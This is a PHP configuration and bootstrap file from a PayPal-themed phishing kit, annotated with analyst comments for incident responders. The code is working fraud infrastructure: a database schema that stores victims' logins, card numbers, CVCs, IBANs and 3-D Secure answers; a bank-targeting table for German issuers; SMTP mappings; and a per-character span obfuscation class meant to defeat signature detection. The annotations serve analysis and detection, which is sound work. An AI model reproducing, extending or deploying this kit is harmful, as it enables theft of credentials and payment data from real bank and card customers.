<?php
// Analyst note: this file is the shared bootstrap/configuration of a phishing kit
// (the database is named `paypal` and the `logs` schema created further down stores
// card and bank details). The comments below describe what the visible code does so
// that responders can read it quickly; nothing here is endorsed.
session_start();
// Configuration
$config = [
// Base URL is derived from the request's Host header, i.e. whatever hostname the
// client sent; it is not a fixed, trusted value.
'url' => 'http://' . $_SERVER['HTTP_HOST'] . '',
// Database credentials in plaintext; the literal password below is a usable
// fingerprint when searching for other copies of this kit.
'mysql' => [
'hostname' => 'localhost',
'username' => 'root',
'password' => 'okmijnAwD1337',
'database' => 'paypal'
],
// Third-party BIN-lookup service settings; the key literal is another kit
// fingerprint. How the service is called is not visible in this file.
'bincodes' => [
'enabled' => true,
'api_key' => '2d974e94811161f1dda14bbf63aa9790'
],
// All SMTPs that do not have the following format: smtp.example.com:25
// (per-domain host/port overrides keyed by e-mail domain; their use is not shown here)
'smtps' => [
'web.de' => [
'host' => 'smtp.web.de',
'port' => 587
],
'aol.com' => [
'host' => 'smtp.de.aol.com',
'port' => 587
],
'aol.de' => [
'host' => 'smtp.aim.com',
'port' => 587
],
'aim.com' => [
'host' => 'smtp.aim.com',
'port' => 587
],
'arcor.de' => [
'host' => 'mail.arcor.de',
'port' => 25
],
'bluewin.ch' => [
'host' => 'smtpauths.bluewin.ch',
'port' => 25
],
'gmail.com' => [
'host' => 'smtp.gmail.com',
'port' => 587
],
'gmail.de' => [
'host' => 'smtp.gmail.com',
'port' => 587
],
'googlemail.com' => [
'host' => 'smtp.gmail.com',
'port' => 587
],
'gmx.de' => [
'host' => 'mail.gmx.net',
'port' => 587
],
'gmx.net' => [
'host' => 'mail.gmx.net',
'port' => 587
],
'outlook.de' => [
'host' => 'smtp-mail.outlook.com',
'port' => 587
],
'live.de' => [
'host' => 'smtp-mail.outlook.com',
'port' => 587
],
'hotmail.de' => [
'host' => 'smtp-mail.outlook.com',
'port' => 587
],
'live.com' => [
'host' => 'smtp-mail.outlook.com',
'port' => 587
],
'outlook.com' => [
'host' => 'smtp-mail.outlook.com',
'port' => 587
],
'yahoo.de' => [
'host' => 'smtp.mail.yahoo.com',
'port' => 25
],
'yahoo.com' => [
'host' => 'smtp.mail.yahoo.com',
'port' => 25
],
't-online.de' => [
'host' => 'securesmtp.t-online.de',
'port' => 25
],
'unitybox.de' => [
'host' => 'submit.unitybox.de',
'port' => 587
],
'kabelbw.de' => [
'host' => 'submit.kabelbw.de',
'port' => 587
],
'one.com' => [
'host' => 'send.one.com',
'port' => 587
],
'freenet.de' => [
'host' => 'mx.freenet.de',
'port' => 587
]
],
// BINs for which the SecureCode prompt is skipped
// (currently empty: the three sample values are commented out)
'skipBins' => [
/*
'457096',
'548622',
'548621'
*/
],
// Banks (write everything in uppercase, otherwise it is not recognised on Debian)
// Issuer-name aliases keyed by a short bank id; getOB() further down matches a
// bank-name string against these aliases (exact, substring or first word) and
// returns the id. What the id selects is not visible in this file.
'banks' => [
'santander' => [
'SANTANDER CONSUMER BANK AG',
'SANTANDER DIREKT BANK AG',
'SANTANDER'
],
'vw' => [
'VOLKSWAGEN BANK GMBH',
'VOLKSWAGEN'
],
'advanzia' => [
'ADVANZIA BANK, S.A.',
'ADVANZIA'
],
'barclay' => [
'BARCLAYS BANK PLC',
'BARCLAYCARD GERMANY',
'BARCLAY'
],
'airp' => [
'LUFTHANSA AIRPLUS SERVICEKARTEN GMBH'
],
'dkb' => [
'DEUTSCHE KREDITBANK AG (DKB), LUFTHANSA, MILES AND MORE',
'DEUTSCHE KREDITBANK'
],
'lbb' => [
'LANDESBANK BERLIN AG'
],
'dzb' => [
'DZ BANK AG',
'DZ BANK AG DEUTSCHE ZENTRAL- GENOSSENSCHAFTSBANK'
],
'wgz' => [
'WGZ BANK AG WESTDEUTSCHE GENOSSENSCHAFTS-ZENTRALBANK',
'WGZ'
],
'volksbank' => [
'VOLKSBANK'
],
'spardabank' => [
'SPARDABANK',
'SPARDA'
],
'postbank' => [
'DEUTSCHE POSTBANK AG',
'POSTBANK BERLIN',
'POSTBANK'
],
'sparkasse' => [
'DEUTSCHER SPARKASSEN - UND GIROVERBAND',
'SPARKASSE',
'SPARKASSEN',
'SPARKASSE SCHAUMBURG',
'SPARKASSE MAINZ',
'STADTSPARKASSE'
],
// Catch-all bucket for issuers that get no dedicated id.
'random' => [
'TARGOBANK AG AND CO. KGAA',
'CITIBANK AG',
'ING-DIBA AG',
'COMMERZBANK AG',
'MERCEDES-BENZ BANK AG',
'LANDESBANK BADEN-WUERTTEMBERG',
'COMDIRECT BANK AG',
'DEUTSCHE BANK AG',
'DEUTSCHE BANK PRIVAT-UND GESCHAEFTSKUNDEN AG',
'BAYERISCHE LANDESBANK GIROZENTRALE',
'BAYERISCHE LANDESBANK',
'SUEDDEUTSCHE BANK GMBH'
]
]
];
// Pulls in a geoblocking include (not part of this file) before the database is set up.
include('geoblocking.php');
// Database bootstrap runs on every request unless the including script defines
// CONTINUE_PDO, in which case an existing $pdo is expected to be in scope.
if(!defined('CONTINUE_PDO')) {
// MySQL Connection
// The DSN carries no dbname: the database is created and selected with raw
// statements below. The name comes from $config, not from request input.
$pdo = new PDO(
'mysql:host=' . $config['mysql']['hostname'] . ';',
$config['mysql']['username'],
$config['mysql']['password']
);
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->query('CREATE DATABASE IF NOT EXISTS ' . $config['mysql']['database']);
$pdo->query('use ' . $config['mysql']['database']);
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
// NOTE(review): MYSQL_ATTR_INIT_COMMAND is a connect-time option; setting it via
// setAttribute() after the connection is open is unlikely to take effect. The
// explicit `SET NAMES` exec on the next line is what actually applies here.
$pdo->setAttribute(PDO::MYSQL_ATTR_INIT_COMMAND, "SET NAMES 'utf8' COLLATE 'utf8_general_ci'");
$pdo->exec('SET NAMES \'utf8\'');
mb_internal_encoding('UTF-8');
// Schema bootstrap, useful to responders as a map of what the kit stores:
//  - `admins`: panel logins, compared as plaintext by isLoggedIn() below, and seeded
//    with a default account ('Admin' / '123456') via INSERT IGNORE.
//  - `logs`: one row per captured victim, with login credentials (`email`,
//    `password`), card data (`cc_*`), bank data (`bank_*`), 3-D Secure style
//    answers (`sc_1`, `sc_2`), address, `timestamp` and `mobilenr`.
// Column widths (int(2)/int(4)/int(5)) are display widths only, not limits.
$pdo->exec('
CREATE TABLE IF NOT EXISTS `admins` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`username` varchar(255) NOT NULL,
`password` varchar(255) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
INSERT IGNORE INTO `admins` VALUES (\'1\', \'Admin\', \'123456\');
CREATE TABLE IF NOT EXISTS `logs` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`ip` varchar(255) DEFAULT NULL,
`user_agent` text,
`email` varchar(255) DEFAULT NULL,
`password` varchar(255) DEFAULT NULL,
`method` enum(\'creditcard\',\'bank\',\'none\') DEFAULT \'none\',
`firstname` varchar(255) DEFAULT NULL,
`surname` varchar(255) DEFAULT NULL,
`dob_day` int(11) DEFAULT \'0\',
`dob_month` int(11) DEFAULT \'0\',
`dob_year` int(11) DEFAULT \'0\',
`cc_number` varchar(255) DEFAULT NULL,
`cc_expire_month` int(2) DEFAULT NULL,
`cc_expire_year` int(4) DEFAULT NULL,
`cc_cvc` int(4) DEFAULT NULL,
`cc_bank` varchar(255) DEFAULT NULL,
`cc_type` varchar(255) DEFAULT NULL,
`cc_level` varchar(255) DEFAULT NULL,
`cc_country` varchar(255) DEFAULT NULL,
`cc_countrycode` varchar(255) DEFAULT NULL,
`cc_card` varchar(255) DEFAULT NULL,
`cc_limit` int(11) DEFAULT \'0\',
`bank_iban` varchar(255) DEFAULT NULL,
`bank_bic` varchar(255) DEFAULT NULL,
`bank_name` varchar(255) DEFAULT NULL,
`sc_1` varchar(255) DEFAULT NULL,
`sc_2` varchar(255) DEFAULT NULL,
`street` varchar(255) DEFAULT NULL,
`city` varchar(255) DEFAULT NULL,
`plz` int(5) DEFAULT NULL,
`timestamp` varchar(255) DEFAULT \'123456789\',
`mobilenr` varchar(255) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=latin1;
');
}
// Classes
/**
 * Per-session markup obfuscation helper.
 *
 * generateUseless() wraps every character of a string in its own <span> whose two
 * class names are session-derived hashes, so the same page text renders with
 * different markup for every visitor. Defender relevance: the page source no
 * longer contains the visible phrases as contiguous strings, so signatures that
 * look for literal text will miss it; keying on the structural pattern (one span
 * per character carrying a single-letter-prefixed sha1 hex class) is more robust.
 */
class RandomHash {
/**
 * Picks one random letter per session and stores it in $_SESSION['randomLetter'].
 * str_shuffle() is not a cryptographic source; ceil(1 / strlen($chars)) is 1, so the
 * alphabet is shuffled once and the character at offset 1 is kept.
 */
public static function init() {
if(!isset($_SESSION['randomLetter'])) {
$_SESSION['randomLetter'] = substr(str_shuffle(str_repeat($chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil(1 / strlen($chars)) )), 1, 1);
}
}
/**
 * Returns the session letter followed by sha1($string . sha1(session_id())).
 * The leading letter keeps the value usable as a CSS class name (no leading digit);
 * the value is bound to the session id, so it differs per visitor.
 *
 * @param string $string label mixed into the hash
 * @return string
 */
public static function generate($string = '') {
return $_SESSION['randomLetter'] . sha1($string . sha1(session_id()));
}
/**
 * md5() of the session letter; used as the label for the second class in
 * generateUseless().
 *
 * @return string
 */
public static function generateUselessKey() {
return md5($_SESSION['randomLetter']);
}
/**
 * Splits a UTF-8 string into characters (or chunks of $l characters when $l > 0).
 *
 * @param string $string
 * @param int    $l chunk length in characters; 0 or less splits per code point
 * @return string[] empty array for an empty string (PREG_SPLIT_NO_EMPTY)
 */
public static function stringSplitUnicode($string, $l = 0) {
if ($l > 0) {
$result = [];
$length = mb_strlen($string, 'UTF-8');
for ($i = 0; $i < $length; $i += $l) {
$result[] = mb_substr($string, $i, $l, 'UTF-8');
}
return $result;
}
return preg_split("//u", $string, -1, PREG_SPLIT_NO_EMPTY);
}
/**
 * Wraps each character of $string in a <span> with two session-derived classes.
 * The character itself is emitted without HTML escaping, so callers must pass
 * trusted text only.
 *
 * @param string $string
 * @return string HTML fragment
 */
public static function generateUseless($string = '') {
$result = '';
foreach(self::stringSplitUnicode($string) as $letter) {
$result .= '<span class="' . self::generate('rnd-span') . ' ' . self::generate(self::generateUselessKey()) . '">' . $letter . '</span>';
}
return $result;
}
}
// Seeds the per-session letter on every include (no-op once it is set).
RandomHash::init();
// Functions
/**
 * Generates a fresh 64-hex-char CSRF token, stores it in $_SESSION['csrf_token'] and
 * returns it. Source of randomness is chosen by PHP version: random_bytes() on
 * PHP >= 7, otherwise mcrypt (if present), otherwise openssl_random_pseudo_bytes()
 * without checking its $crypto_strong flag.
 *
 * @return string
 */
function generateToken() {
if(version_compare(phpversion(), '7', '>=')) {
$_SESSION['csrf_token'] = bin2hex(random_bytes(32));
} else if(function_exists('mcrypt_create_iv')) {
$_SESSION['csrf_token'] = bin2hex(mcrypt_create_iv(32, MCRYPT_DEV_URANDOM));
} else {
$_SESSION['csrf_token'] = bin2hex(openssl_random_pseudo_bytes(32));
}
return $_SESSION['csrf_token'];
}
/**
 * Returns the session's CSRF token, generating one on first use.
 * The isset() check is redundant: empty() already returns true for an unset key.
 *
 * @return string
 */
function getToken() {
if(!isset($_SESSION['csrf_token']) || empty($_SESSION['csrf_token'])) {
generateToken();
}
return $_SESSION['csrf_token'];
}
/**
 * Maps a bank name to one of the ids in $config['banks'].
 *
 * An alias matches when it equals the (uppercased) name, contains it, or contains
 * the name's first space-separated word; the first matching id is returned in
 * config order. count(explode(...)) > 0 is always true (explode returns at least
 * one element). An empty $bankName is an edge case: on PHP 8 strpos() with an
 * empty needle returns 0, so the first configured id would be returned.
 * Uses byte-wise strtoupper()/strpos(); the aliases are ASCII.
 *
 * @param string $bankName
 * @return string|null bank id, or null when nothing matches
 */
function getOB($bankName) {
global $config;
$bankName = strtoupper($bankName);
foreach($config['banks'] as $obKey => $obNames) {
foreach($obNames as $obName) {
if(strtoupper($obName) == $bankName || strpos(strtoupper($obName), $bankName) !== false || (count(explode(' ', $bankName)) > 0 && strpos(strtoupper($obName), explode(' ', $bankName)[0]) !== false)) {
return strtolower($obKey);
}
}
}
return null;
}
/**
 * Checks the panel login stored in the session against the `admins` table.
 *
 * The session holds the password itself and it is compared as plaintext in SQL
 * (no hashing), so a copy of the database or of session files yields working
 * panel credentials. The query is re-run on every call. Uses the global $pdo.
 *
 * @return bool
 */
function isLoggedIn() {
global $pdo;
if(isset($_SESSION['acp_username'], $_SESSION['acp_password'])) {
$stmt = $pdo->prepare('SELECT NULL FROM `admins` WHERE `username` = ? AND `password` = ? LIMIT 1');
$stmt->execute([$_SESSION['acp_username'], $_SESSION['acp_password']]);
return $stmt->rowCount() > 0;
}
return false;
}
/**
 * Number of rows in `logs` (captured records), obtained via rowCount() on a
 * SELECT rather than COUNT(*); this relies on the MySQL driver's buffered-query
 * behaviour. Uses the global $pdo.
 *
 * @return int
 */
function getLogsCount() {
global $pdo;
$qry = $pdo->query('SELECT NULL FROM `logs`');
return $qry->rowCount();
}
/**
 * Reads one column of the logged-in admin's row.
 *
 * $row is concatenated into the SQL as a backtick-quoted identifier without any
 * validation, so callers must pass only a fixed, known column name, never request
 * input. $filter applies htmlspecialchars() with default flags (no ENT_SUBSTITUTE,
 * charset per ini default). Returns '' when not logged in or the row is missing.
 *
 * @param string $row    column name of `admins`
 * @param bool   $filter HTML-escape the value
 * @return string
 */
function getUserInfo($row, $filter = true) {
global $pdo;
if(isLoggedIn()) {
$stmt = $pdo->prepare('SELECT `' . $row . '` FROM `admins` WHERE `username` = ? AND `password` = ? LIMIT 1');
$stmt->execute([$_SESSION['acp_username'], $_SESSION['acp_password']]);
if($stmt->rowCount() > 0) {
$obj = $stmt->fetch(PDO::FETCH_OBJ);
return $filter ? htmlspecialchars($obj->{$row}) : $obj->{$row};
}
}
return '';
}
/**
 * Best-effort client address: prefers the Client-IP, X-Forwarded-For and
 * CF-Connecting-IP request headers (in that order) over REMOTE_ADDR.
 *
 * All three headers are set by whoever sends the request, so the returned value is
 * not an authenticated source address; X-Forwarded-For may also be a comma-separated
 * list, which is returned whole. Only REMOTE_ADDR reflects the actual TCP peer.
 *
 * @return string
 */
function getIp() {
$ip = $_SERVER['REMOTE_ADDR'];
if(!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} else if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else if(isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {
$ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
}
return $ip;
}
?>